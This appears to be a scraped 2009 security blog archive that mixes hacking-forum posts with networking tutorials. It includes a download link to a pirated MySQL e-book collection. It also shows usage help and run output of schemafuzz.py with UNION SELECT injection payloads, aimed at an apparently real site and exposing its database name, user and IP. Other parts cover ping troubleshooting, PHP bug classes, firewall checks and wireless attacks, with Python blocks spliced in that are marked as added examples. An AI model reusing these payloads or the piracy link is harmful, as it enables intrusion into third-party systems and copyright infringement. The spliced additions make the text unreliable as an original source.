6. Thou shalt not copy or use proprietary software for which you have not paid.
7. Thou shalt not use other people's computer resources without authorization or proper compensation.
8. Thou shalt not appropriate other people's intellectual output.
9. Thou shalt think about the social consequences of the program you are writing or the system you are designing.
10. Thou shalt always use a computer in ways that insure consideration and respect for your fellow humans.

If I helped, post some feedback, if I didn't PM me with your question and if it warrants an answer I will reply and add that into the tutorial.

Don't forget to RATE my thread. 5 Stars would be nice.
Last minute addition:
Definitive SQL E-Book Collection
Contents:
The Visibooks Guide to MySQL Basics
Sybex - Mastering MySQL 4
Sams - Teach Yourself Mysql in 10 Minutes
Sams - MySQL Database Design and Tuning
Sams - MySQL Tutorial
Sams - MySQL Phrasebook - Essential Code and Commands
Sams - MySQL Crash Course
Sams - MySQL Certification Study Guide
Sams - MySQL 2nd Edition
Peachpit Press - Visual Quickstart Guide -MySQL
O'Reilly - MySQL Pocket Reference
O'Reilly - MySQL in a Nutshell
O'Reilly - MySQL Cookbook
O'Reilly - MySQL and mSQL
O'Reilly - Managing and Using MySQL
O'Reilly - High Performance MySQL
MySQL Press - MySQL Administrator's Guide and Language Reference
McGraw Hill - MySQL Essential Skills

Download Link


http://www.hackforums.net/showthread.php?tid=94738

Tuesday, June 2, 2009

LAMPSecurity.org Capture the Flag Exercise

Hello,

I'm happy to announce that the second installment (cryptically called
CTF5) of LAMPSecurity.org's capture the flag series of exercises is now
available. This edition is novel in that it includes a 0-day exploit
that can be used (indirectly) to gain root. This is a training exercise
released in support of the educational mission of LAMPSecurity.org. The
exercise is modeled after many of the exercises that are presented in
expensive commercial training courses, except it's free, of course.
Unlike tools like OWASP's WebGoat, LAMPSecurity.org's capture the flag
exercise consists of a full, vulnerable, virtual machine (VMWare's free
Player is required). This allows users to explore vulnerabilities at
every level of the LAMP stack. The first exercise includes an "attack"
VM as well, with tools pre-installed (where possible). It also includes
over 60 pages of step-by-step documentation so no prior experience is
necessary (although the documentation only outlines one of several
routes to root compromise). The exercise is designed to educate system
administrators and developers on some common dangers and
mis-configurations facing Linux, Apache, MySQL, PHP (LAMP) applications.
Further details, including the documentation, are available at
http://lampsecurity.org/capture-the-flag-5. The vulnerable virtual
machine and attack image are available from SourceForge at
https://sourceforge.net/projects/lampsecurity/. Constructive feedback is
of course welcome. Thank you and enjoy.

--
Justin C. Klein Keane
http://www.MadIrish.net
http://www.LAMPSecurity.org

Wednesday, May 27, 2009

schemafuzz.py by rsauron

schemafuzz.py -h
Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot]com darkc0de.com
Modes:
Define: --dbs Shows all databases user has access too. MySQL v5+
Define: --schema Enumerate Information_schema Database. MySQL v5+
Define: --full Enumerates all databases information_schema table MySQL v5+
Define: --dump Extract information from a Database, Table and Column. MySQL v4+
Define: --fuzz Fuzz Tables and Columns. MySQL v4+
Define: --findcol Finds Columns length of a SQLi MySQL v4+
Define: --info Gets MySQL server configuration only. MySQL v4+

Required:
Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"

Mode dump and schema options:
Define: -D "database_name"
Define: -T "table_name"
Define: -C "column_name,column_name..."

Optional:
Define: -p "127.0.0.1:80 or proxy.txt"
Define: -o "ouput_file_name.txt" Default is schemafuzzlog.txt
Define: -r row number to start at
Define: -v Verbosity off option. Will not display row #'s in dump mode.

Ex: ./schemafuzz.py --info -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
Ex: ./schemafuzz.py --dbs -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
Ex: ./schemafuzz.py --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D catalog -T orders -r 200
Ex: ./schemafuzz.py --dump -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D joomla -T jos_users -C username,password
Ex: ./schemafuzz.py --fuzz -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -end "/*" -o sitelog.txt
Ex: ./schemafuzz.py --findcol -u "www.site.com/news.php?id=22"


schemafuzz.py -u http://www.ayamitiklembu/news.php?id=1 --findcol

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL: http://www.ayamitiklembu/news.php?id=1--
[+] Evasion Used: "+" "--"
[+] 23:35:53
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,
[+] Column Length is: 4
[+] Found null column at column #: 1
[+] SQLi URL: http://www.ayamitiklembu/news...+0,1,2,3--
[+] darkc0de URL: http://www.ayamitiklembu/news...rkc0de,2,3

[-] Done!

schemafuzz.py -u http://www.ayamitiklembu/news...rkc0de,2,3 --fuzz

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL: http://www.ayamitiklembu/news...c0de,2,3--
[+] Evasion Used: "+" "--"
[+] 23:43:22
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: web27-gc
User: web27-gc@79.170.40.171
Version: 5.0.77-community
[+] Number of tables names to be fuzzed: 338
[+] Number of column names to be fuzzed: 249

[+] Searching for tables and columns...

Reference:
http://www.hackforums.net/showthread.php?tid=79972

Monday, May 25, 2009

Troubleshooting Connectivity Problems on Windows Networks

This article series will explain various troubleshooting techniques that you can use when machines on a Windows network have difficulty communicating with each other.

If you would like to be notified when Brien M. Posey releases the next part of this article series please sign up to the WindowsNetworking.com Real time article update newsletter.

Today’s network hardware and software is more reliable than ever but even so, things do occasionally go wrong. In this article series, I am going to discuss some troubleshooting techniques that you can use when a host on your Windows network has trouble communicating with other network hosts. For the sake of those with less experience in working with the TCP/IP protocol, I’m going to start with the basics, and then work toward the more advanced techniques.

Verify Network Connectivity

When one host has trouble communicating with another, the first thing that you must do is to gather some information about the problem. More specifically, you need to document the host’s configuration, find out if the host is having trouble communicating with any other machines on the network, and find out if the problem affects any other hosts.

For example, suppose that a workstation is having trouble communicating with a particular server. That in itself doesn’t really give you a lot to go on. However, if you were to dig a little bit deeper into the problem and found out that the workstation couldn’t communicate with any of the network servers, then you would know to check for a disconnected network cable, a bad switch port, or maybe a network configuration problem.

Likewise, if the workstation were able to communicate with some of the network servers, but not all of them, that too would give you a hint as to where to look for the problem. In that type of situation, you would probably want to check to see what the servers that could not be contacted had in common. Are they all on a common subnet? If so, then a routing problem is probably to blame.

If multiple workstations are having trouble communicating with a specific server, then the problem probably isn’t related to the workstations unless those workstations were recently reconfigured. More than likely, it is the server itself that is malfunctioning.

The point is that by starting out with a few basic tests, you can gain a lot of insight into the problem at hand. The tests that I am about to show you will rarely show you the cause of the problem, but they will help to narrow things down so that you will know where to begin the troubleshooting process.

PING

PING is probably the simplest TCP/IP diagnostic utility ever created, but the information that it can provide you with is invaluable. Simply put, PING tells you whether or not your workstation can communicate with another machine.

The first thing that I recommend doing is opening a Command Prompt window, and then entering the PING command, followed by the IP address of the machine that you are having trouble communicating with. When you do, the machine that you have specified should produce four replies, as shown in Figure A.


Figure A: The specified machine should generate four replies

The responses essentially tell you how long it took the specified machine to respond with thirty-two bytes of data. For example, in Figure A, each of the four responses was received in less than four milliseconds.

Typically, when you issue the PING command, one of four things will happen, each of which has its own meaning.

The first thing that can happen is that the specified machine will produce four replies. This indicates that the workstation is able to communicate with the specified host at the TCP/IP level.

The second thing that can happen is that all four requests time out, as shown in Figure B. If you look at Figure A, you will notice that each response ends in TTL=128. TTL stands for Time To Live. What this means is that each of the four queries and responses must be completed within 128 milliseconds. The TTL is also decremented once for each hop on the way back. A hop occurs when a packet moves from one network to another. I will be talking a lot more about hops later on in this series.


Figure B: If all four requests time out, it could indicate a communications failure

At any rate, if all four requests have timed out, it means that the TTL expired before the reply was received. This can mean one of three things:

Communications problems are preventing packets from flowing between the two machines. This could be caused by a disconnected cable, a bad routing table, or a number of other issues.
Communications are occurring, but are too slow for PING to acknowledge. This can be caused by extreme network congestion, or by faulty network hardware or wiring.
Communications are functional, but a firewall is blocking ICMP traffic. PING will not work unless the destination machine’s firewall (and any firewalls between the two machines) allow ICMP echoes.

A third thing that can happen when you enter the PING command is that some replies are received, while others time out. This can point to bad network cabling, faulty hardware, or extreme network congestion.

The fourth thing that can occur when pinging a host is that you receive an error similar to the one that is shown in Figure C.


Figure C: This type of error indicates that TCP/IP is not configured correctly

The PING: Transmit Failed error indicates that TCP/IP is not configured correctly on the machine on which you are trying to enter the PING command. This particular error is specific to Vista though. Older versions of Windows produce an error when TCP/IP is configured incorrectly, but the error message is “Destination Host Unreachable”.

What if the PING is Successful?

Believe it or not, it is not uncommon for a ping to succeed, even though two machines are having trouble communicating with each other. If this happens, it means that the underlying network infrastructure is good, and that the machines are able to communicate at the TCP/IP level. Typically, this is good news, because it means that the problem that is occurring is not very serious.

If normal communications between two machines are failing, but the two machines can PING each other successfully (be sure to run the PING command from both machines), then there is something else that you can try. Rather than pinging the network host by IP address, try replacing the IP address with the host’s fully qualified domain name, as shown in Figure D.


Figure D: Try pinging the network host by its fully qualified domain name

If you are able to ping the machine by its IP address, but not by its fully qualified domain name, then you most likely have a DNS issue. The workstation may be configured to use the wrong DNS server, or the DNS server may not contain a host record for the machine that you are trying to ping.

If you look at Figure D, you can see that the machine’s IP address is listed just to the right of its fully qualified domain name. This proves that the machine was able to resolve the fully qualified domain name. Make sure that the IP address that the name was resolved to is correct. If you see a different IP address than the one that you expected, then you may have an incorrect DNS host record.
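The triage above (four PING outcomes, then the FQDN and resolved-address check) as a small Python script; this is an added example, not code from Brien Posey's article. The ping transcripts and the host name fileserver.corp.example are constructed placeholders; feed classify_ping the real text of a Windows ping run.

```python
"""Classify Windows ``ping`` output into the article's four outcomes.

Added example, not code from the original article. The transcripts below are
constructed to look like Windows ping output; pass ``classify_ping`` the real
text of ``ping <host>`` to triage it.
"""
import re
from dataclasses import dataclass
from typing import Optional

# "Reply from 10.0.0.7: bytes=32 time<1ms TTL=128"  (time may read "<1ms" or "=3ms")
REPLY_RE = re.compile(r"^Reply from (?P<ip>\S+?): bytes=\d+ time[<=](?P<ms>\d+)ms TTL=(?P<ttl>\d+)")
# "Pinging name [10.0.0.70] with 32 bytes of data:" -> the address the name resolved to (Figure D)
RESOLVED_RE = re.compile(r"^Pinging (?P<name>\S+) \[(?P<ip>[\d.]+)\] with")

# What the article says each outcome means and where to look next.
ADVICE = {
    "all_replied": "Connectivity at the TCP/IP level is fine; repeat by FQDN and look above the network layer.",
    "all_timed_out": "No replies: check cabling, switch port and routing, extreme congestion, "
                     "or a firewall blocking ICMP echo on the target or in between.",
    "partial": "Some replies lost: suspect bad cabling, faulty hardware or extreme congestion.",
    "stack_misconfigured": "TCP/IP is misconfigured on the machine running ping; fix that first.",
    "name_not_resolved": "The name did not resolve: check the DNS server setting and the host record.",
    "unrecognized": "Output not recognized as Windows ping output.",
}


@dataclass
class PingVerdict:
    outcome: str
    replies: int
    timeouts: int
    resolved_ip: Optional[str]
    dns_mismatch: bool
    advice: str


def classify_ping(output: str, expected_ip: Optional[str] = None) -> PingVerdict:
    """Map one ping transcript onto the article's outcomes.

    ``expected_ip`` is the address the name *should* resolve to; when the
    "Pinging name [ip]" line shows a different address, the verdict flags a
    DNS host-record problem, the check the article recommends for Figure D.
    """
    replies = timeouts = 0
    resolved_ip = None
    outcome = None
    for raw in output.splitlines():
        line = raw.strip()
        m = RESOLVED_RE.match(line)
        if m:
            resolved_ip = m.group("ip")
        elif REPLY_RE.match(line):
            replies += 1
        elif line == "Request timed out.":
            timeouts += 1
        elif line.lower().startswith("ping: transmit failed") or "destination host unreachable" in line.lower():
            outcome = "stack_misconfigured"      # Vista wording, and the older Windows wording
        elif line.startswith("Ping request could not find host"):
            outcome = "name_not_resolved"
    if outcome is None:
        if replies and not timeouts:
            outcome = "all_replied"
        elif replies:
            outcome = "partial"
        elif timeouts:
            outcome = "all_timed_out"
        else:
            outcome = "unrecognized"
    advice = ADVICE[outcome]
    mismatch = bool(expected_ip and resolved_ip and resolved_ip != expected_ip)
    if mismatch:
        advice += f" Name resolved to {resolved_ip}, expected {expected_ip}: check the DNS host record."
    return PingVerdict(outcome, replies, timeouts, resolved_ip, mismatch, advice)


# Constructed transcripts (not captured from a real host).
SAMPLE_OK = """\
Pinging 10.0.0.7 with 32 bytes of data:
Reply from 10.0.0.7: bytes=32 time<1ms TTL=128
Reply from 10.0.0.7: bytes=32 time=2ms TTL=128
Reply from 10.0.0.7: bytes=32 time<1ms TTL=128
Reply from 10.0.0.7: bytes=32 time=3ms TTL=128
"""
SAMPLE_TIMEOUT = "Pinging 10.0.0.7 with 32 bytes of data:\n" + "Request timed out.\n" * 4
SAMPLE_PARTIAL = ("Pinging 10.0.0.7 with 32 bytes of data:\n"
                  "Reply from 10.0.0.7: bytes=32 time=1ms TTL=128\nRequest timed out.\n"
                  "Reply from 10.0.0.7: bytes=32 time=1ms TTL=128\nRequest timed out.\n")
SAMPLE_TRANSMIT = "Pinging 10.0.0.7 with 32 bytes of data:\nPING: transmit failed, error code 1231.\n"
SAMPLE_NONAME = "Ping request could not find host fileserver.corp.example. Please check the name and try again.\n"
# The name resolves, but to a different address than the host should have (the Figure D check).
SAMPLE_FQDN = """\
Pinging fileserver.corp.example [10.0.0.70] with 32 bytes of data:
Reply from 10.0.0.70: bytes=32 time=1ms TTL=128
Reply from 10.0.0.70: bytes=32 time=1ms TTL=128
Reply from 10.0.0.70: bytes=32 time=1ms TTL=128
Reply from 10.0.0.70: bytes=32 time=1ms TTL=128
"""

if __name__ == "__main__":
    for label, text in (("by IP", SAMPLE_OK), ("by FQDN", SAMPLE_FQDN)):
        v = classify_ping(text, expected_ip="10.0.0.7")
        print(f"{label}: {v.outcome} ({v.replies} replies) -> {v.advice}")
```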

Conclusion

In this article, I have shown you some steps for testing basic connectivity between two machines. In the next article in the series, I will show you some more techniques that you can use in the troubleshooting process.

**************************************************
Published: Aug 14, 2008
Updated: Sep 26, 2008
Section: Articles & Tutorials :: Network Troubleshooting
Author: Brien M. Posey
Rating: 3.6/5 - 32 Votes
If you would like to read other parts to this article please go to:

Troubleshooting Connectivity Problems on Windows Networks (Part 2)
Troubleshooting Connectivity Problems on Windows Networks (Part 3)
Troubleshooting Connectivity Problems on Windows Networks (Part 4)
Troubleshooting Connectivity Problems on Windows Networks (Part 5)

http://www.windowsnetworking.com/articles_tutorials/Troubleshooting-Connectivity-Problems-Windows-Networks-Part1.html

http://searchnetworking.techtarget.com/tip/0,289483,sid7_gci1355527_mem1,00.html

Saturday, April 25, 2009

20 ways to php Source code fuzzing (Auditing)

Hello .

This article is only for those who know PHP well and really know how to program in PHP.

When we talk about PHP vulnerability discovery, we forget this question:
What types of bugs?

Once we can answer this question, finding vulnerabilities becomes as easy as drinking a glass of water.

In this article:

Section 1 : (20 ways to PHP source code Auditing - PHP Fuzzing)
1- Cross Site Scripting
2- SQL Injection [medium]
3- HTTP Response Splitting [Medium]
4- Dynamic Evaluation Vulnerabilities [High]
5- Process Control / PHP Code Injection (HIGH)
6- Local / Remote file inclusion (High)
7 – File Management (HIGH)
8- Buffer overflows (High, But Hard Usage)
9- Cookie / Session injection / Fixation / [High]
10 – Denial Of service [Medium, But Hard Assessment]:
11 - XPath Injection [XML Functions]
12 - Often Misused: File Uploads (High)
13 - Unauthorized Invocation of Functionality / Files (Medium)
14 - Authentication Bypass with Brute Force (Low)
15 - Insecure Randomness Session / Cookie / Backup files (Medium)
16 - Informative details in HTML Comments (Low)
17 - Default unnecessary installation files (medium)
18 – Regular Expression Vulnerability (High)
19 – Resource Injection (Medium)
20 – Weak Password / Encryption (Low)

Section 2:
Automatic PHP Auditor source code

This article is not a full reference on PHP source code security review (a.k.a. auditing), but I tried to do the work as well as I could in the short time I had. So please accept my apologies for any mistakes I may have made while completing this article. I’m not sure, but I may release a future version of this article that contains a few more advanced methods.

Here are some of the topics I may add to this article in the next version:
1- More real-world attacks with descriptions
2- PHPIDS defense.
3- More dangerous functions: CURL – socket – create_function & ….
4- PEAR functions and their secure use.
5- Information about books on PHP secure coding.
6- And more

Download :

php-fuzzing-auditing-version-1.0

thanks.

Daphne

http://abysssec.com/blog/2009/03/php_fuzz_audit/
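A minimal automatic PHP source auditor in the spirit of Section 2, covering items 4, 5, 6, 7 and 12 of the list above; this is an added example, not the auditor distributed with the article. It flags dangerous sinks and raises the severity when the sink's line uses a superglobal or a variable assigned from one earlier in the file. The PHP sample is constructed.

```python
"""Tiny PHP sink auditor for a few of the bug classes listed above.

Added example, not the article's own tool. It is a line-oriented scan with
simple taint propagation, so it misses sinks spread over several lines and
cannot see through functions; treat its output as review candidates.
"""
import re
from typing import List, Set, Tuple

# Sink -> (list item, category), numbered as in the article's list.
SINKS = {
    "eval": (4, "Dynamic Evaluation"), "create_function": (4, "Dynamic Evaluation"),
    "preg_replace /e": (4, "Dynamic Evaluation"),
    "system": (5, "Process Control"), "exec": (5, "Process Control"),
    "shell_exec": (5, "Process Control"), "passthru": (5, "Process Control"),
    "popen": (5, "Process Control"), "proc_open": (5, "Process Control"),
    "include": (6, "File Inclusion"), "include_once": (6, "File Inclusion"),
    "require": (6, "File Inclusion"), "require_once": (6, "File Inclusion"),
    "fopen": (7, "File Management"), "file_get_contents": (7, "File Management"),
    "file_put_contents": (7, "File Management"), "unlink": (7, "File Management"),
    "move_uploaded_file": (12, "File Uploads"),
}
CALL_NAMES = [n for n in SINKS if " " not in n and not n.startswith(("include", "require"))]
CALL_RE = re.compile(r"\b(" + "|".join(map(re.escape, CALL_NAMES)) + r")\s*\(")
INCLUDE_RE = re.compile(r"\b(?:include|require)(?:_once)?\b")   # no parentheses required
EVAL_MOD_RE = re.compile(r"\bpreg_replace\s*\(\s*['\"]/.*?/[a-zA-Z]*e[a-zA-Z]*['\"]")
SUPERGLOBAL_RE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE|FILES|SERVER)\b")
ASSIGN_RE = re.compile(r"^\s*\$(\w+)\s*=(?!=)")                    # "$var = ..." at line start
VAR_RE = re.compile(r"\$(\w+)\b")

Finding = Tuple[int, str, str, str]   # (line number, sink, "item: category", severity)


def find_sinks(code: str) -> List[str]:
    names = [m.group(1) for m in CALL_RE.finditer(code)]
    names += [m.group(0) for m in INCLUDE_RE.finditer(code)]
    if EVAL_MOD_RE.search(code):
        names.append("preg_replace /e")
    return names


def audit_php(source: str) -> List[Finding]:
    tainted: Set[str] = set()          # variables assigned from user input so far
    findings: List[Finding] = []
    for no, line in enumerate(source.splitlines(), 1):
        code = line.split("//", 1)[0]  # naive: drops trailing // comments (and URLs)
        user_input = bool(SUPERGLOBAL_RE.search(code)) or any(
            v in tainted for v in VAR_RE.findall(code))
        for sink in find_sinks(code):
            item, category = SINKS[sink]
            findings.append((no, sink, f"{item}: {category}", "High" if user_input else "Medium"))
        m = ASSIGN_RE.match(code)
        if m and user_input:           # propagate taint to the assigned variable
            tainted.add(m.group(1))
    return findings


# Constructed PHP sample exercising each tracked class.
SAMPLE_PHP = r"""<?php
$page = $_GET['page'];
include($page . '.php');                         // 6: user chooses the included file
eval('$x = ' . $_POST['expr'] . ';');            // 4: user input is evaluated
$dir = '/var/www/uploads';
system('ls ' . escapeshellarg($dir));            // 5: argument not user-controlled here
$out = preg_replace('/x/e', 'strtoupper("$1")', $s);  // 4: /e evaluates the replacement
move_uploaded_file($_FILES['f']['tmp_name'], 'up/' . $_FILES['f']['name']);  // 12
echo htmlspecialchars($page);                    // encoded output: not a tracked sink
"""

if __name__ == "__main__":
    for no, sink, category, severity in audit_php(SAMPLE_PHP):
        print(f"line {no:>3}  {severity:<6} {category:<22} {sink}")
```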

Monday, April 20, 2009

Information Gathering

New School Information Gathering
http://www.toorcon.org/tcx/17_Gates.pdf
@
http://www.carnal0wnage.com/research/newschoolinfogathering-chicagocon.pdf

Information Gathering: The Complete Documentation
http://www.l0t3k.org/security/docs/gathering/

Passive Information Gathering Techniques
http://seclists.org/basics/2004/Feb/0073.html

Saturday, April 18, 2009

Wireless Attacks and Penetration Testing

Wireless Attacks and Penetration Testing (part 1 of 3)
Jonathan Hassell 2004-06-03
http://www.securityfocus.com/infocus/1783

Wireless Attacks and Penetration Testing (part 2 of 3)
Jonathan Hassell 2004-06-14
http://www.securityfocus.com/infocus/1785

Wireless Attacks and Penetration Testing (part 3 of 3)
Jonathan Hassell 2004-07-26
http://www.securityfocus.com/infocus/1792


Figure 1: Sniffing packets with AirSnort

Saturday, March 28, 2009

Checkpoint Firewall - IPSO Standard Health Check

GUI = Smart View Monitor

CLI as below
fw stat
cpstat fw
cphaprob stat

to check the HA state

For Nokia Box, run
clish
show vrrp

Friday, March 27, 2009

Checkpoint Firewall - Fw Monitor

[PDF]
How to use fw monitor
http://www.checkpoint.com/techsupport/downloads/html/ethereal/fw_monitor_rev1_01.pdf

[DOC]
FW MONITOR
www.cpug.org/check_point_resources/FW%20MONITOR_expert.doc

[PDF]
Fw Monitor
www.nokia.com/NOKIA_COM_1/About_Nokia/Press/White_Papers/pdf_files/technicalwhitepaper_fwmonitoring.pdf

grep pix log

grep "Sep 26 20:" pix.log | grep "PIX-1-" | grep -v -e Teardown -e Built -e Deny -e Accessed -e access-list -e Inbound

Thursday, March 26, 2009

Cisco Pix Firewall - Standard Health Check

1.
sh fail
- to check which unit (primary or secondary) is currently active or standby
- the date of the last failover
- check the status of all firewall interfaces

2.
sh conn count
- check how many connections there are; if there are many, the firewall is indeed passing traffic

3.
sh conn
- to view the connections

4.
sh mem
- check firewall memory

5.
sh cpu usage
- check firewall CPU utilization

6.
sh int
- check all interfaces on the firewall

Saturday, February 14, 2009

One of my students just copy-pasted everything from here for their wireless assignment.. got u! :P

http://technet.microsoft.com/en-us/library/bb457019.aspx

2.4GHz vs. 5GHz Deployment Considerations

When deploying a wireless LAN, companies must make a decision on whether to use network interface cards (NICs) and access points designed to operate in the 2.4GHz or 5GHz band (or both). Not too long ago the choice of frequency band was easy, when only 2.4GHz (i.e., 802.11b) products were available. Now, 802.11b and 802.11g products are both available that operate in the 2.4GHz band, while 802.11a use the 5GHz band. This can cause confusion when designing a WLAN, so let's take a look at what you need to consider when making this critical resolution.

http://www.wi-fiplanet.com/tutorials/article.php/1569271

Sunday, February 8, 2009

Wireless threats, vulnerabilities and solution


Wireless networks broadcast their packets using radio frequency or optical wavelengths. A modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the fly and persuade wireless stations to accept his packets as legitimate.
The step-by-step procedure in wireless hacking can be explained with the help of the following topics:

1) Stations and Access Points :- A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station.
An access point (AP) is a station that provides frame distribution service to stations associated with it. 
The AP itself is typically connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage.

2) Channels :- The stations communicate with each other using radio frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless networks using neighboring channels may interfere with each other.

3) Wired Equivalent Privacy (WEP) :- It is a shared-secret key encryption system used to encrypt packets transmitted between a station and an AP. The WEP algorithm is intended to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the payload of data packets. Management and control frames are always transmitted in the clear. WEP uses the RC4 encryption algorithm.

4) Wireless Network Sniffing :- Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help find the easy kill as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections.

5 ) Passive Scanning :- Scanning is the act of sniffing by tuning to various radio channels of the devices. A passive network scanner instructs the wireless card to listen to each channel for a few messages. This does not reveal the presence of the scanner. An attacker can passively scan without transmitting at all. 

6) Detection of SSID :- The attacker can discover the SSID of a network usually by passive scanning because the SSID occurs in the following frame types: Beacon, Probe Requests, Probe Responses, Association Requests, and Reassociation Requests. Recall that management frames are always in the clear, even when WEP is enabled.
When the above methods fail, SSID discovery is done by active scanning.

7) Collecting the MAC Addresses :- The attacker gathers legitimate MAC addresses for use later in constructing spoofed frames. The source and destination MAC addresses are always in the clear in all the frames.

8) Collecting the Frames for Cracking WEP :- The goal of an attacker is to discover the WEP shared-secret key. The attacker sniffs a large number of frames. An example of a WEP cracking tool is AirSnort ( http://airsnort.shmoo.com ).

9) Detection of the Sniffers :- Detecting the presence of a wireless sniffer, who remains radio-silent, through network security measures is virtually impossible. Once the attacker begins probing (i.e., by injecting packets), the presence and the coordinates of the wireless device can be detected.

10) Wireless Spoofing :- There are well-known attack techniques known as spoofing in both wired and wireless networks. The attacker constructs frames by filling selected fields that contain addresses or identifiers with legitimate looking but non-existent values, or with values that belong to others. The attacker would have collected these legitimate values through sniffing.

11) MAC Address Spoofing :- The attacker generally desires to be hidden. But the probing activity injects frames that are observable by system administrators. The attacker fills the Sender MAC Address field of the injected frames with a spoofed value so that his equipment is not identified.

12) IP spoofing :- Replacing the true IP address of the sender (or, in rare cases, the destination) with a different address is known as IP spoofing. This is a necessary operation in many attacks.

13) Frame Spoofing :- The attacker will inject frames that are valid but whose content is carefully spoofed.

14) Wireless Network Probing :- The attacker then sends artificially constructed packets to a target that trigger useful responses. This activity is known as probing or active scanning.

15) AP Weaknesses :- APs have weaknesses that are due both to design mistakes and to user interfaces.

16) Trojan AP :- An attacker sets up an AP so that the targeted station receives a stronger signal from it than what it receives from a legitimate AP.

17) Denial of Service :- A denial of service (DoS) occurs when a system is not providing services to authorized clients because of resource exhaustion by unauthorized clients. In wireless networks, DoS attacks are difficult to prevent and difficult to stop once under way, and the victim and its clients may not even detect the attacks. The duration of such a DoS may range from milliseconds to hours. A DoS attack against an individual station enables session hijacking.

18) Jamming the Air Waves :- A number of consumer appliances such as microwave ovens, baby monitors, and cordless phones operate on the unregulated 2.4GHz radio frequency. An attacker can unleash large amounts of noise using these devices and jam the airwaves so that the signal to noise drops so low, that the wireless LAN ceases to function.

19) War Driving :- Equipped with wireless devices and related tools, and driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks is known as war driving. War-drivers (http://www.wardrive.net) define war driving as “The benign act of locating and logging wireless access points while in motion.” This benign act is of course useful to the attackers. 
Regardless of the protocols, wireless networks will remain potentially insecure because an attacker can listen in without gaining physical access.
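Items 6 and 16 above rest on the fact that beacon frames carry the SSID and BSSID in the clear. The following added example (not code from the original post) parses a raw 802.11 beacon and, from the defender's side, flags a beacon that advertises one of our SSIDs from a BSSID not in our inventory, or an approved AP that has lost its privacy (encryption) bit. The beacon bytes and the approved-AP table are constructed placeholders; no capture or radio is involved.

```python
"""Parse an 802.11 beacon for SSID/BSSID and flag an unapproved access point.

Added example, not from the original post. Frame layout used here: 24-byte
management header, 12 bytes of fixed fields (timestamp, interval,
capability), then tagged parameters as (id, length, value); SSID is tag 0,
DS Parameter Set (channel) is tag 3.
"""
from typing import Dict, Optional, Set

SSID_TAG, DS_PARAM_TAG = 0, 3
CAP_PRIVACY = 0x0010      # capability bit set when WEP/WPA is in use


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_beacon(bssid: bytes, ssid: bytes, channel: int, privacy: bool) -> bytes:
    """Assemble a minimal well-formed beacon (constructed test input only)."""
    fc = b"\x80\x00"                                   # type 0 (management), subtype 8 (beacon)
    header = fc + b"\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x10\x00"
    cap = 0x0001 | (CAP_PRIVACY if privacy else 0)    # ESS bit, optional privacy bit
    fixed = (0).to_bytes(8, "little") + (100).to_bytes(2, "little") + cap.to_bytes(2, "little")
    tags = bytes([SSID_TAG, len(ssid)]) + ssid + bytes([1, 1, 0x82]) + bytes([DS_PARAM_TAG, 1, channel])
    return header + fixed + tags


def parse_beacon(frame: bytes) -> Dict[str, object]:
    """Return bssid, ssid, channel and privacy flag from a raw beacon frame."""
    if len(frame) < 36:
        raise ValueError("frame too short for a beacon")
    ftype, subtype = (frame[0] >> 2) & 0x3, frame[0] >> 4
    if ftype != 0 or subtype != 8:
        raise ValueError("not a beacon frame")
    cap = int.from_bytes(frame[34:36], "little")
    info: Dict[str, object] = {"bssid": mac_str(frame[16:22]), "ssid": None,
                               "channel": None, "privacy": bool(cap & CAP_PRIVACY)}
    pos = 36
    while pos + 2 <= len(frame):
        tag_id, tag_len = frame[pos], frame[pos + 1]
        value = frame[pos + 2:pos + 2 + tag_len]
        if len(value) != tag_len:
            raise ValueError("truncated information element")
        if tag_id == SSID_TAG:
            # Length 0 means a "hidden" SSID (the Disable SSID Broadcast tip).
            info["ssid"] = value.decode("utf-8", "replace")
        elif tag_id == DS_PARAM_TAG and tag_len == 1:
            info["channel"] = value[0]
        pos += 2 + tag_len
    return info


def check_ap(info: Dict[str, object], approved: Dict[str, Set[str]]) -> Optional[str]:
    """Flag a beacon that reuses one of our SSIDs from an unknown BSSID (a
    Trojan AP / evil twin) or an approved AP advertising no encryption."""
    ssid, bssid = info["ssid"], info["bssid"]
    if ssid not in approved:
        return None                                    # somebody else's network
    if bssid not in approved[ssid]:
        return f"SSID {ssid!r} advertised by unapproved BSSID {bssid}"
    if not info["privacy"]:
        return f"approved AP {bssid} is advertising {ssid!r} without encryption"
    return None


# Constructed placeholder inventory of our own access points.
APPROVED = {"corp-wifi": {"00:11:22:33:44:55"}}

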